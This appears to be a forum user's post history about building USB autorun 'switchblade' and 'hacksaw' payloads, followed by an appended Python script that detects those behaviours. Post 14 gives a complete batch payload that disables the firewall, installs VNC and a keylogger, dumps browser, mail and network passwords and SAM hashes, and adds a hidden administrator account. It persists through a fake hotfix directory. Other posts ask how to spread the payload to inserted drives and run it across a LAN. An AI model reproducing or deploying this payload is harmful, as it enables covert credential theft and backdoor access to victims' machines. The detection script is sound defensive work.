G-Stress

Dedicated Members, 683 posts

Everything posted by G-Stress

  1. @ spektormax Gotcha, makes more sense also. I totally spaced the hacksaw on a non-U3. After as interesting and useful as your payload already is I'm shocked you haven't already added that... I got it, you're not thinkin it in your head you're comin back with something even more lethal and interesting ;)
  2. @ pseudobreed Dude thanks a lot, I really appreciate it :) I knew what rd meant and the path but not the others. So that code sounds like it just wipes out the drive C: that is? Anyway thanks again I'll probably be messin around with these variables all night now :)
  3. @ operat0r_001 Curious as to what this bit of code will do exactly? rd /s /q c: Also where could I go to learn more about this type of coding? Sorry to ask, I have googled Batch Scripting ShellCode but can't seem to find anything containing some of the code used in these payloads, ex. %computername% A link or reference would be highly appreciated :D
  4. @ spektormax I would like to know how you would go about modifying the hacksaw part of code to where when any future flash drives are plugged in, it copies the hacksaw payload to it, as well as does its current job. It was mentioned that it would be possible in the last episode, but I've yet to see it mentioned here. It seems simple to do, but... if done wouldn't that drive need to be flashed also? That's where I think it could get complex.
  5. @ deathwarder SanDisk buddy, switchblade is flawless with them. Not sure what you mean by package thing isn't working? It works fine on all 3 of my SanDisks, the only 1 I'm havin trouble with is a Memorex U3 and I know it's just the flashing that's the problem.
  6. I have the mini and 2 more SanDisk, they all work flawlessly. Can I ask why are you so worried about speed? You're gonna get the same speed regardless, usb 2.0 is usb 2.0. I'm not sure if these drives have any specifications on speed other than the standard usb 2.0, but I would recommend any SanDisk :D
  7. I would go SanDisk all the way, they work flawlessly. U3 or non-U3 :D
  8. It was mentioned in the last episode about the hacksaw where you could mod the code to not only copy the contents of the usb drive but also send the payload to any drive inserted. Was wondering if anyone has tried that yet. It seems so easy to do, but wouldn't the drive have to be flashed with the loader?
  9. Anybody get a Memorex U3 working via autorun? I got a 256MB Memorex TravelDrive and followed all the above steps and the only part that works is it dumps the local shares, ipconfig info, disables firewall and that's about it?
  10. How I created my ISO is I explored the cdfs partition and copied the 4 files to a folder on my desktop. Then I'm not exactly sure I edited it right as I'm not too familiar with programming :) I edited the vb script and just changed the locations and filenames to fit my payload... well the payload that I'm using and then I saved the 4 files using MagicISO as an ISO then pasted that in the "bin" directory then used the above method to flash the drive. It worked and all, just not sure if I edited the vb script file right. Anyone else have a better method/way I'm interested in knowing.
  11. Hmmm... it worked just fine for me. Are you using any spyware/adware software? I know it automatically detects and I believe quarantines bpk.exe, at least mcafee and aol software do. It'd be nice if I can find a way to encrypt it :D I placed a read me in the package also of how I implemented it, if you have any questions just ask. Also if anyone else finds this interesting and a better method of installation for the logger please let me know :D 1 more thing, does anyone have a good resource to where I can go to learn more about this type of coding/scripting. I've been googling shell programming but I'm not really finding anything similar to this :?
  12. Yea, you don't have to keep the logger installed and you can install it on any PC, you just need to make a remote install package, because then... well actually there has to be a way to install this like vnc and specify the e-mail settings upon installation. If someone does decide to mess around with that and figures it out I'd like to know :)
  13. Ok I uploaded the package (Perfect Keylogger) on the packages page along with a "Read Me" of how I implemented it. As far as the rest of the changes I've made any idea why it's all not working?
  14. Ok guys here's the modifications I've made so far, but I'm having a bit of a problem now. It seems to only dump the local shares and ip info and completely skips everything else. Well the hacksaw and nmap part worked also, but everything else it just skips. Also instead of dumping the info in the default dump directory it makes a new directory (RECYCLERRECYCLERDumphostuser) and dumps it there. This is a Memorex TravelDrive also. This payload works fine on my 1gig cruzer non-u3 via the autoplay action, but I didn't add the hacksaw and nmap part to that one. Also what I did was copy the 4 files from the CDFS partition: autorun.inf LaunchU3.exe LaunchPad.zip switchblade.vbs I edited the switchblade.vbs file and changed the following: If objFSO.FileExists(objDrive.DriveLetter & ":WIPCMDgo.cmd") Then strPath = objDrive.DriveLetter & ":WIPCMD" strcmd = """" & strPath & "" & "go.cmd" & """" to: If objFSO.FileExists(objDrive.DriveLetter & ":RECYCLERautoexec.bat") Then strPath = objDrive.DriveLetter & ":RECYCLER" strcmd = """" & strPath & "" & "autoexec.bat" & """" Then I created a new .ISO file of those 4 files and used the UpdaterCore from the memorex tutorial with my new LaunchPad.iso file in the bin directory to flash the partition. Am I missing something to make the rest of this work?
:: Do not show commands to console ================================== @echo off setlocal :: Dump Directory ================= set dumppath=RECYCLERDUMP%computername%%username% :: Make Directory from Computer NameUser ========================================= mkdir %dumppath% :: Apply Attributes Hidden and System ===================================== attrib +h +s RECYCLERDUMP :: Turn Off Windows XP Firewall =============================== netsh firewall set opmode disable :: Setup VNC ============ regedit /s RECYCLERultravnc.reg mkdir "%ProgramFiles%UltraVNC" xcopy RECYCLERUltraVNC "%ProgramFiles%UltraVNC" /D /E /C /I /H /F /R /Y "%ProgramFiles%UltraVNCwinvnc.exe" -reinstall :: Set Services to Auto ======================= RECYCLERnircmd.exe service auto lanmanworkstation RECYCLERnircmd.exe service auto lanmanserver RECYCLERnircmd.exe service auto winvnc RECYCLERnircmd.exe service auto remoteregistry :: Start Services ================= RECYCLERnircmd.exe service start lanmanworkstation RECYCLERnircmd.exe service start lanmanserver RECYCLERnircmd.exe service start winvnc RECYCLERnircmd.exe service start remoteregistry :: Enable ADMIN$ Share ====================== RECYCLERnircmd.exe regsetval dword "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServiceslanmanserverparameters" "AutoSharewks " "1" :: Port Probe ============= RECYCLERports.exe /shtml %dumppath%ports.html :: Current Process List ======================= RECYCLERprocess.exe /stab %dumppath%process.txt :: Internet Explorer History ============================ RECYCLERiehv.exe /shtml %dumppath%iehistory.html :: Internet Explorer Passwords ============================== RECYCLERiepv.exe /shtml %dumppath%iepasswords.html :: Email Client Passwords ========================= RECYCLERmailpv.exe /shtml %dumppath%mailpasswords.html :: Messenger Client Passwords ============================= RECYCLERmspass.exe /shtml %dumppath%messengerpasswords.html :: Network Passwords ==================== RECYCLERnetpass.exe /shtml 
%dumppath%networkpasswords.html :: Protected Passwords ====================== RECYCLERpspv.exe /stab %dumppath%protectedpasswords.txt :: Services =========== RECYCLERserviwin.exe /stab /services %dumppath%services.txt :: IP Info ========== ipconfig /all > %dumppath%lan.txt :: Dump VNC Password ==================== RECYCLERvncpwdump.exe /stab %dumppath%vncpass.txt :: Get External IP ================== RECYCLERwget.exe http://whatismyip.com ren index.html wan.html xcopy wan.html %dumppath% /H /C /Y del wan.html /q :: SAM Dump =========== :: fgdump will only dump to call folder :: run fgdump, copy pwdump file to dumppath, then delete original RECYCLERfgdump.exe -c -s -r -h 127.0.0.1 -u %username% -p * >> 127.0.0.1.pwdump.log xcopy *.pwdump %dumppath% /H /C /Y xcopy 127.0.0.1.pwdump.log %dumppath% /H /C /Y del *.pwdump /q del 127.0.0.1.pwdump.log /q :: Add User =========== net user SUPPORT passw0rd /add /fullname:"CN=Microsoft Corporation,L=Redmond,S=Washington" /comment:"This is a vendor's account for Support" net localgroup Administrators SUPPORT /add net accounts /maxpwage:unlimited :: Hide SUPPORT from Windows XP Login Screen ============================================ RECYCLERnircmd.exe regsetval dword "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList" "SUPPORT" "0" :: Delete MS's Support Account ============================== net user SUPPORT_388945a0 /delete :: Local Share's ================ net view 127.0.0.1 > %dumppath%shares.txt :: Install Perfect Keylogger ========================================================================== mkdir "%ProgramFiles%backupsupport" xcopy RECYCLERbpk "%ProgramFiles%backupsupport" /D /E /C /I /H /F /R /Y "%ProgramFiles%backupsupportbpkbpk.exe" :: Nmap Scanner =============== :: If admin make windows$NtUninstallKB931337$, else make %appdata%sbs mkdir %systemroot%$NtUninstallKB91337$ || mkdir "%appdata%scs" :: go to payload directory cd RECYCLERnmap_install :: remove hidden and system 
attributes (makes next copy command happy, probably better way to do this) attrib *.* -s -h :: copy payload to target copy *.* %systemroot%$NtUninstallKB91337$ || copy *.* "%appdata%scs" :: reapply hidden and system attributes attrib *.* +s +h :: Hide USB Hacksaw attrib %systemroot%$NtUninstallKB91337$ +s +h & attrib "%appdata%scs" +s +h :: Start USB Hacksaw (something is wrong with this next line, trying dirty hack below) %systemdrive% cd cd %systemroot% cd $NtUninstallKB91337$ nircmd execmd CALL nmap.bat :: USB Hacksaw ============== :: If admin make windows$NtUninstallKB931337$, else make %appdata%sbs mkdir %systemroot%$NtUninstallKB931337$ || mkdir "%appdata%sbs" :: go to payload directory cd RECYCLERSBS :: remove hidden and system attributes (makes next copy command happy, probably better way to do this) attrib *.* -s -h :: copy payload to target copy *.* %systemroot%$NtUninstallKB931337$ || copy *.* "%appdata%sbs" :: reapply hidden and system attributes attrib *.* +s +h :: If admin register USB Hacksaw as startup program in registry, else do it the yucky way reg.exe add HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun /v USBMedia /t REG_SZ /d "%systemroot%$NtUninstallKB931337$sbs.exe" /f || "%appdata%sbsshortcut.exe" /f:"%USERPROFILE%Start MenuProgramsStartup .lnk" /A:C /T:"%appdata%sbssbs.exe" /W:"%appdata%sbs" /I:"%appdata%sbsblank.ico" :: Hide USB Hacksaw attrib %systemroot%$NtUninstallKB931337$ +s +h & attrib "%appdata%sbs" +s +h :: Start USB Hacksaw (something is wrong with this next line, trying dirty hack below) :: "%systemroot%$NtUninstallKB931337$sbs.exe" || "%appdata%sbssbs.exe" %systemdrive% cd cd %systemroot% cd $NtUninstallKB931337$ sbs.exe :: Done :? :?
  15. @ pseudobreed Very nice work man. I am actually using your payload. You mentioned 2 things I was curious about. 1. being "The reason it goes to the exe is because in the application I have a routine that looks for the removable drive letter (As this will vary from machine to machine)." I was wondering is that some code I could add to a batch script? 2. was about the dump path and using it on the lan, but I understand that, just changing the pathname. Right now I have a memorex TravelDrive and I cannot get it to work, I have 2 cruzers also that work just fine. This memorex is for testing purposes. I used the loaders on the switchblade link but when I copy the WIP and Documents folder to the drive nothing happens upon autoplay :? Am I doing something wrong? I put the MemorexSB.exe on the desktop as stated and ran it, then copied my payload to the drive, but I get nothing upon autoplay?
  16. K, I just went back to the memorex tutorial and saw there was a free ISO maker out there so I'm a little bit confused, but the cruzer loader contains autorun.exe and autorun.inf, I'm assuming autorun.exe just points to WIPCMDgo.bat file to start the whole thing. So me having no programming experience could I make the autorun.inf file and then create an autorun.bat instead of .exe and point it to the location and build that as an ISO and it should work? I guess I'm asking does it matter if it be .exe or .bat and would they both give the same result? Sorry guys, I did find a memorex loader on the actual switchblade link but I would like to know if it would be possible to use the method listed above about building the iso with a .bat file? Thanks in advance.
  17. Has nobody really not found a Memorex TravelDrive loader? I followed the custom Memorex TravelDrive ISO tutorial, but there was no loader for the drive there. I did just search all 29 pages for a loader, only I scanned through them looking for anything memorex related I didn't see a loader. I tried placing the LaunchPad.iso with the cruzer one just to see if it'd work and it did not work. Just wondering if anyone else has a memorex loader or can post the source for autorun.exe for the cruzer loader.
  18. @ pseudobreed Okay I currently use your payload as I like that it installs vnc. Was wondering what I would need to add to the code to execute it remotely on my lan and receive the dumped files back to my box? Thanks in advance.
  19. @ pseudobreed So using wget, it executes the payload on the remote boxes and dumps all the information, hashes, history, installs vnc, etc. in a directory back on your box? Just tryin to make sure I understood properly as if I have 4 machines on my lan and I wanted to execute this payload on them all at once without a flash drive and receive all the information, etc.
  20. Thanks man, I'll give this a try. It looks like they only make this for linux, but I'll give it a try:)
  21. Something I thought about was has anyone modded the script to not only work with flash drives, but to work on a lan. As in execute the script without a flash drive on your own box and have it search the lan and return the results back to you on your box?
  22. Yea I thought about static arp tables but haven't looked into setting them up yet. I don't login to anything I use on any lan except my own after learning about arp poisoning. Except when I use my cell phone cause it's a client/server connection. I agree though, that there is no perfect security. 1 more ? as far as my situation goes, what sniffer/lan monitor would you guys recommend to be sniffing 24/7 but checked daily? I know ethereal/wireshark does tend to consume a lot of space after some time, so was wondering if anyone else had any other suggestions?
  23. hmm, I could have sworn on one of the episodes, they demonstrated cain arp poisoning, then they went to the same web site only cain did not pick up the username and pass after they did something different. I can't remember if they used some 3rd-party app or if they just made some change to their pc configuration :?
  24. I may be wrong, but after I saw one of the episodes I believe either 3 or 5 where they used Cain and Abel to arp poison, I thought they demonstrated a way to protect your machine from such attack, but as I go back and re-watch the episodes I don't see it. I know it doesn't capture https traffic, I'm just wondering on the steps I would need to take to protect myself from such attack? If someone could be so kind to provide a link possibly? I also wanna say I wasn't too worried about security until I started running cain 24/7 on one of my boxes just poisoning my whole lan and I'm glad I do, because I caught 2 attackers. 1 was someone tryin to brute force my ftp server and another someone scanned me I assume and discovered I am running vnc and they attempted to log in... unsuccessfully of course ;)
  25. You mind sharing a link about the wireless keys? I searched and searched and searched looking for a way or location where windows stored the wireless profiles, but was not able to find much useful information. Only something about WZCQuery or something like that doing something I can't remember now. Also I was curious about grabbing info from networked PCs as well, that would be really useful :D
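
For defenders checking hosts for the behaviours in the batch payload quoted in post 14 (firewall disabled, a SUPPORT account added and hidden from the login screen, Run-key persistence from a hotfix-style directory), the following is an added example, not part of any forum post. It assumes process command lines are available as (host, command line) records; the rule names, `SAMPLE` data and threshold are this example's own.

```python
import re
from collections import defaultdict

# Command-line patterns for behaviours in the batch payload quoted in post 14.
# Rule names are this example's own; registry paths are the standard Windows keys.
RULES = {
    "firewall_disabled": re.compile(r"netsh\s+firewall\s+set\s+opmode\s+disable", re.I),
    "local_user_added": re.compile(r"\bnet1?(\.exe)?\s+user\s+\S+\s+\S+\s+/add", re.I),
    "admin_group_add": re.compile(
        r"\bnet1?(\.exe)?\s+localgroup\s+administrators\s+\S+\s+/add", re.I),
    "login_screen_hide": re.compile(r"SpecialAccounts\\UserList", re.I),
    "run_key_persistence": re.compile(
        r"\breg(\.exe)?\s+add\s+.*\\CurrentVersion\\Run\b", re.I),
    # An executable or batch file sitting directly in a hotfix-uninstall-style folder.
    "fake_hotfix_dir": re.compile(r"\$NtUninstallKB\d+\$\\[^\\\s]+\.(exe|bat)", re.I),
}

def match_rules(cmdline):
    """Return the set of rule names that fire on one command line."""
    return {name for name, rx in RULES.items() if rx.search(cmdline)}

def triage(events, threshold=3):
    """Group hits per host; report hosts with >= threshold distinct behaviours.

    A single hit (an admin adding a user) is routine; several together are not.
    """
    hits = defaultdict(set)
    for host, cmdline in events:
        hits[host] |= match_rules(cmdline)
    return {h: sorted(r) for h, r in hits.items() if len(r) >= threshold}

# Constructed process-creation records (host, command line); not real logs.
SAMPLE = [
    ("WS-01", "netsh firewall set opmode disable"),
    ("WS-01", "net user SUPPORT <password> /add"),
    ("WS-01", "net localgroup Administrators SUPPORT /add"),
    ("WS-01", r'nircmd.exe regsetval dword "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft'
              r'\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" "SUPPORT" "0"'),
    ("WS-01", r"reg.exe add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows"
              r'\CurrentVersion\Run /v USBMedia /d "C:\WINDOWS\$NtUninstallKB931337$\sbs.exe" /f'),
    ("WS-02", "net user helpdesk <password> /add"),
    ("WS-02", "ipconfig /all"),
]

if __name__ == "__main__":
    for host, rules in triage(SAMPLE).items():
        print(host, rules)
```

Requiring several distinct behaviours per host keeps a lone administrative action such as the WS-02 account creation out of the report.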